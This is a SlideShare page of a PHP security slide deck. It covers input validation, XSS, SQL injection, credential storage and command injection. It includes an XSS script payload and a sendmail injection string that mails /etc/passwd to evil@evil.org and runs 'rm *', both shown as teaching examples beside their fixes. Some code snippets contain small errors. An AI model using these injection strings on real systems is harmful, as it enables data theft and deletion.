SlideShare a Scribd company logo

Php security

Download as PPT, PDF
Uttam Kumar, profile picture
Uttam Kumar

This document discusses various PHP security issues and best practices for securing PHP web applications. It covers topics like input validation, SQL injection prevention, session security, cross-site scripting (XSS) attacks, and command injection. The document provides recommendations such as using PHP functions like mysql_real_escape_string(), prepared statements, stripslashes(), and htmlentities() to prevent attacks. It also recommends validating all input data, encrypting sensitive authentication data, and using escapeshellcmd() and escapeshellarg() when calling external programs.

Technology
1 of 17
Downloaded 11 times
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
PHP Security by Uttam KUmar Email:- trickyuk001@gmail.com Mobile:- 8149253187
What is Security? measurement… safety… protection…
Secure Web Applications web security issues have to do with: – hacker attacks • denial of service • server hijacking – common threats – compromise of data
PHP & Security a growing language… a major concern…
Never trust the web… Input data validation – register_globals = OFF – $_REQUEST[] big NO NO … – type casting input data • No isNumeric() if data is numeric [locale problem] • regularExp if data is string – Path validation • Always use basename()
Never trust the web… • Content size validation – use server side max length validation – File Upload • Check destination file size with $_FILES[‘name’][‘size’] • I think Browser MIME header is reliable right ? – Use getImageSize() in case of image • External source upload like Avtar – Make a local copy if path/of/file submitted from a URL.
XSS attack – Can lead to embarrassment. – Session take-over. – Password theft. – User tracking by 3rd parties
XSS attack Prevention is better than cure – Use striptags() • No tag allowance please – Use htmlentities() – Is $_SERVER safe ? • Can be set… • Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo • $_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo; • $_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo – IP based info • Use HTTP_X_FORWARDED_FOR • Use long2ip() – $aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]); – $sValidIp = long2ip(ip2long(array_pop($ipss)));
SQL Injection WWW – Arbitrary query execution – Removal of data. – Modification of existing values. – Denial of service. – Arbitrary data injection.
Preventing SQL injection • Are magic quotes enough? – use mysql_real_escape_string() – use prepared statements – avoid omitting single quotes – LIKE quandary need addslashes() – avoid printing query – Authentication data storage • Encrypt sensitive data to access database • Make sure it’s only loaded for certain VirtualHost
Authentication Data Storage SetEnv DB_LOGIN “login” SetEnv DB_PASSWD “password” Set Env DB_HOST “127.0.0.7” <virtualHost iila.ws> include /home/illa/sql.conf </virtualHost> $_SERVER[‘DB_LOGIN’] $_SERVER[‘DB_PASSWD’] /home/illa/sql.conf Apache server configuration PHP file Better Approach is to set these things under php’s ini directives use php_admin_value mysql.default.user. “login”
Preventing code injection – Path validation – Validate fileName $sFile = “D’sozaRes.doc’; basename($sFile); //will return D’sozaRes.doc on *nix system basename($sFile); //will return ’sozaRes.doc on win32 • Remove slashes • Keep white list of file name • Use full path – Avoid variables in eval() – Avoid using variable passed by users for regEx.
Command injection – Use escapeshellcmd() and escapeshellarg() – Use full path for command – Set prority and memory limit for command • shell_exec(“ulimit –t 20 –m 20000; /usr/bin/php test.php”);
Calling External Programs <?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?> The user could control $to to yield: http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A which would result in running the command: /usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm * a solution would be: $fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);
Securing sessions • Weakness of session – Server side weakness… • ls –l /tmp/sess_* //can reveal session info – URL session exploitation • Solution – Native protection. – Mixing security and convenience. – Securing session storage path – Check browser signature – Referrer validation
Questions…????
Thank You !!

More Related Content

PPTX
Application and Server Security
Brian Pontarelli
 
PDF
10 tips to improve your website security
Sucuri
 
PDF
Security in php
Jalpesh Vasa
 
PPTX
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
PDF
I Have the Power(View)
Will Schroeder
 
PDF
4.4 PHP Session
Jalpesh Vasa
 
PPT
php $_GET / $_POST / $_SESSION
tumetr1
 
PDF
4 Basic PHP
Jalpesh Vasa
 
Application and Server Security
Brian Pontarelli
 
10 tips to improve your website security
Sucuri
 
Security in php
Jalpesh Vasa
 
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
I Have the Power(View)
Will Schroeder
 
4.4 PHP Session
Jalpesh Vasa
 
php $_GET / $_POST / $_SESSION
tumetr1
 
4 Basic PHP
Jalpesh Vasa
 

What's hot (20)

PPTX
Introduction to Web security
jeyaselvir
 
PPTX
WordPress Security - WordPress Meetup Copenhagen 2013
Thor Kristiansen
 
PPT
Apache Web Server Setup 1
Information Technology
 
PPTX
Ch7(publishing my sql data on the web)
Chhom Karath
 
PDF
Tips for Fixing A Hacked WordPress Site - Vlad Lasky
WordCamp Sydney
 
PDF
Google Hacking Basics
amiable_indian
 
PDF
Hack proof your ASP NET Applications
Sarvesh Kushwaha
 
PPT
Apache Web Server Setup 4
Information Technology
 
PDF
Apache Server Tutorial
Jagat Kothari
 
PPT
WordCamp Chicago 2011 - WordPress End User Security - Dre Armeda
Dre Armeda
 
PDF
AmazonS3 & Rails
_martinS_
 
PPTX
Anatomy of a Drupal Hack - TechKnowFile 2014
University of Toronto Libraries - Information Technology Services
 
PPTX
Bridging the Gap
Will Schroeder
 
PDF
Cross site calls with javascript - the right way with CORS
Michael Neale
 
PDF
Securing WordPress
Shawn Hooper
 
PPTX
Whats new in ASP.NET 4.0
py_sunil
 
PDF
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
PPTX
What You Missed in Computer Science
Taylor Lovett
 
PPT
Securing Your Web Server
manugoel2003
 
PPTX
Web Application Development using PHP Chapter 7
Mohd Harris Ahmad Jaal
 
Introduction to Web security
jeyaselvir
 
WordPress Security - WordPress Meetup Copenhagen 2013
Thor Kristiansen
 
Apache Web Server Setup 1
Information Technology
 
Ch7(publishing my sql data on the web)
Chhom Karath
 
Tips for Fixing A Hacked WordPress Site - Vlad Lasky
WordCamp Sydney
 
Google Hacking Basics
amiable_indian
 
Hack proof your ASP NET Applications
Sarvesh Kushwaha
 
Apache Web Server Setup 4
Information Technology
 
Apache Server Tutorial
Jagat Kothari
 
WordCamp Chicago 2011 - WordPress End User Security - Dre Armeda
Dre Armeda
 
AmazonS3 & Rails
_martinS_
 
Anatomy of a Drupal Hack - TechKnowFile 2014
University of Toronto Libraries - Information Technology Services
 
Bridging the Gap
Will Schroeder
 
Cross site calls with javascript - the right way with CORS
Michael Neale
 
Securing WordPress
Shawn Hooper
 
Whats new in ASP.NET 4.0
py_sunil
 
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
What You Missed in Computer Science
Taylor Lovett
 
Securing Your Web Server
manugoel2003
 
Web Application Development using PHP Chapter 7
Mohd Harris Ahmad Jaal
 
Ad

Viewers also liked (20)

KEY
Rabobank - Crowdfunding: De bank buitenspel?
Ronald Kleverlaan
 
PDF
Innovation at Israel Mobile Monetization Summit
Eric Reiss
 
PDF
Ochoa marmex
Irene Calvo
 
PDF
WIAD Budapest 2014
Eric Reiss
 
PPT
Best Practices for Second Life
Dr Poonsri Vate-U-Lan
 
PDF
Crowdfunding - ProductIP - Meer dan geld alleen
Ronald Kleverlaan
 
PDF
Users, experience, and beyond
Eric Reiss
 
PPS
Ppt paragraaf 2.2_klas_3
Riporter
 
PPT
Presentation at Day 0 2010
Keerthi Kiran K
 
KEY
“CheckinDJ” Using Check-Ins to Crowdsource Music Preferences
University of Central Lancashire
 
PDF
Of brains and buttons (UXCE, Berlin, Germany)
Eric Reiss
 
PDF
Grassroutes For Manthan
Keerthi Kiran K
 
PPS
Halloween
Jose Luis Leon Gonzalez
 
PDF
Crowdfunding introductie KvK en Livewire
Ronald Kleverlaan
 
PDF
TEDxThe HagueLIVE Sponsor Presentation
earlybird44
 
DOC
A Framework to Identify Best Practices: Social Media and Web 2.0 Technologies...
Connie White
 
PDF
Crowdfunding - more than money - V4 conference
Ronald Kleverlaan
 
PDF
Topics, trends, and telephones
Eric Reiss
 
PDF
Django Girls 2015 - CSS
Hsuan Fu Lien
 
PPSX
Career 101 - Career Tips They Didn't Teach You in College
Hannah Almira Amora
 
Rabobank - Crowdfunding: De bank buitenspel?
Ronald Kleverlaan
 
Innovation at Israel Mobile Monetization Summit
Eric Reiss
 
Ochoa marmex
Irene Calvo
 
WIAD Budapest 2014
Eric Reiss
 
Best Practices for Second Life
Dr Poonsri Vate-U-Lan
 
Crowdfunding - ProductIP - Meer dan geld alleen
Ronald Kleverlaan
 
Users, experience, and beyond
Eric Reiss
 
Ppt paragraaf 2.2_klas_3
Riporter
 
Presentation at Day 0 2010
Keerthi Kiran K
 
“CheckinDJ” Using Check-Ins to Crowdsource Music Preferences
University of Central Lancashire
 
Of brains and buttons (UXCE, Berlin, Germany)
Eric Reiss
 
Grassroutes For Manthan
Keerthi Kiran K
 
Halloween
Jose Luis Leon Gonzalez
 
Crowdfunding introductie KvK en Livewire
Ronald Kleverlaan
 
TEDxThe HagueLIVE Sponsor Presentation
earlybird44
 
A Framework to Identify Best Practices: Social Media and Web 2.0 Technologies...
Connie White
 
Crowdfunding - more than money - V4 conference
Ronald Kleverlaan
 
Topics, trends, and telephones
Eric Reiss
 
Django Girls 2015 - CSS
Hsuan Fu Lien
 
Career 101 - Career Tips They Didn't Teach You in College
Hannah Almira Amora
 
Ad

Similar to Php security (20)

PPT
Php Security
Amit Kumar Singh
 
PPT
Php My Sql Security 2007
Aung Khant
 
ODP
My app is secure... I think
Wim Godden
 
ODP
Security In PHP Applications
Aditya Mooley
 
PDF
Intro to Php Security
Dave Ross
 
PPT
Download It
webhostingguy
 
PPT
Security.ppt
webhostingguy
 
PPT
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
PPTX
Secure programming with php
Mohmad Feroz
 
PPTX
Php security common 2011
10n Software, LLC
 
PPT
secure php
Riyad Bin Zaman
 
PPT
Php security
ssrajsathya
 
ODP
LAMP security practices
Amit Kejriwal
 
PPTX
Securing your web apps now
Stephan Steynfaardt
 
PDF
Tulsa techfest2010 security
Jason Ragsdale
 
PPT
PHPUG Presentation
Damon Cortesi
 
PDF
PHP Secure Programming
Balavignesh Kasinathan
 
PPT
Php Security By Mugdha And Anish
OSSCube
 
PPT
Php & Web Security - PHPXperts 2009
mirahman
 
PDF
Session10-PHP Misconfiguration
zakieh alizadeh
 
Php Security
Amit Kumar Singh
 
Php My Sql Security 2007
Aung Khant
 
My app is secure... I think
Wim Godden
 
Security In PHP Applications
Aditya Mooley
 
Intro to Php Security
Dave Ross
 
Download It
webhostingguy
 
Security.ppt
webhostingguy
 
12-security.ppt - PHP and Arabic Language - Index
webhostingguy
 
Secure programming with php
Mohmad Feroz
 
Php security common 2011
10n Software, LLC
 
secure php
Riyad Bin Zaman
 
Php security
ssrajsathya
 
LAMP security practices
Amit Kejriwal
 
Securing your web apps now
Stephan Steynfaardt
 
Tulsa techfest2010 security
Jason Ragsdale
 
PHPUG Presentation
Damon Cortesi
 
PHP Secure Programming
Balavignesh Kasinathan
 
Php Security By Mugdha And Anish
OSSCube
 
Php & Web Security - PHPXperts 2009
mirahman
 
Session10-PHP Misconfiguration
zakieh alizadeh
 

Recently uploaded (20)

PDF
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PDF
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
PDF
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PPTX
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
PPTX
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 
PDF
Approach and Philosophy of On baking technology
30anthuong17
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PDF
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
PPTX
MYSQL Presentation for SQL database connectivity
Swati270511
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PPTX
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 
Reach Out and Touch Someone: Haptics and Empathic Computing
Mark Billinghurst
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
Per capita expenditure prediction using model stacking based on satellite ima...
IAESIJAI
 
Network Security Unit 5.pdf for BCA BBA.
Serpent6
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Libreria ERP
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
sap open course for s4hana steps from ECC to s4
sreeni2106invites
 
Approach and Philosophy of On baking technology
30anthuong17
 
Teaching material agriculture food technology
LiaRayya
 
Unlocking AI with Model Context Protocol (MCP)
Brian McKeiver
 
MYSQL Presentation for SQL database connectivity
Swati270511
 
Cloud computing and distributed systems.
kkkkkhan
 
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
Programs and apps: productivity, graphics, security and other tools
4mqw9zch22
 

Php security

  • 1. PHP Security by Uttam KUmar Email:- trickyuk001@gmail.com Mobile:- 8149253187
  • 3. Secure Web Applications web security issues have to do with: – hacker attacks • denial of service • server hijacking – common threats – compromise of data
  • 4. PHP & Security a growing language… a major concern…
  • 5. Never trust the web… Input data validation – register_globals = OFF – $_REQUEST[] big NO NO … – type casting input data • No isNumeric() if data is numeric [locale problem] • regularExp if data is string – Path validation • Always use basename()
  • 6. Never trust the web… • Content size validation – use server side max length validation – File Upload • Check destination file size with $_FILES[‘name’][‘size’] • I think Browser MIME header is reliable right ? – Use getImageSize() in case of image • External source upload like Avtar – Make a local copy if path/of/file submitted from a URL.
  • 7. XSS attack – Can lead to embarrassment. – Session take-over. – Password theft. – User tracking by 3rd parties
  • 8. XSS attack Prevention is better than cure – Use striptags() • No tag allowance please – Use htmlentities() – Is $_SERVER safe ? • Can be set… • Php.php/%22%3E%3Cscript%3Ealert(‘xss’)%3c/script%3E%3cfoo • $_SERVER[‘PATH_INFO’] = /”><script>alert(‘xss’)</script><foo; • $_SERVER[‘PHP_SELF’] = /php.php/”><script> alert(‘xss’)</script><foo – IP based info • Use HTTP_X_FORWARDED_FOR • Use long2ip() – $aIp = explode(‘,’,$_SERVER[HTTP_X_FORWARDED_FOR]); – $sValidIp = long2ip(ip2long(array_pop($ipss)));
  • 9. SQL Injection WWW – Arbitrary query execution – Removal of data. – Modification of existing values. – Denial of service. – Arbitrary data injection.
  • 10. Preventing SQL injection • Are magic quotes enough? – use mysql_real_escape_string() – use prepared statements – avoid omitting single quotes – LIKE quandary need addslashes() – avoid printing query – Authentication data storage • Encrypt sensitive data to access database • Make sure it’s only loaded for certain VirtualHost
  • 11. Authentication Data Storage SetEnv DB_LOGIN “login” SetEnv DB_PASSWD “password” Set Env DB_HOST “127.0.0.7” <virtualHost iila.ws> include /home/illa/sql.conf </virtualHost> $_SERVER[‘DB_LOGIN’] $_SERVER[‘DB_PASSWD’] /home/illa/sql.conf Apache server configuration PHP file Better Approach is to set these things under php’s ini directives use php_admin_value mysql.default.user. “login”
  • 12. Preventing code injection – Path validation – Validate fileName $sFile = “D’sozaRes.doc’; basename($sFile); //will return D’sozaRes.doc on *nix system basename($sFile); //will return ’sozaRes.doc on win32 • Remove slashes • Keep white list of file name • Use full path – Avoid variables in eval() – Avoid using variable passed by users for regEx.
  • 13. Command injection – Use escapeshellcmd() and escapeshellarg() – Use full path for command – Set prority and memory limit for command • shell_exec(“ulimit –t 20 –m 20000; /usr/bin/php test.php”);
  • 14. Calling External Programs <?php $fp = popen(‘/usr/sbin/sendmail -i ‘. $to , ‘w’); ?> The user could control $to to yield: http://examp.com/send.php?$to=evil%40evil.org+%3C+%2Fpasswd%3B+rm+%2A which would result in running the command: /usr/sbin/sendmail -i evil@evil.org /etc/passwd; rm * a solution would be: $fp = popen(‘/usr/sbin/sendmail -i ‘ . escapeshellarg($to), ‘w’);
  • 15. Securing sessions • Weakness of session – Server side weakness… • ls –l /tmp/sess_* //can reveal session info – URL session exploitation • Solution – Native protection. – Mixing security and convenience. – Securing session storage path – Check browser signature – Referrer validation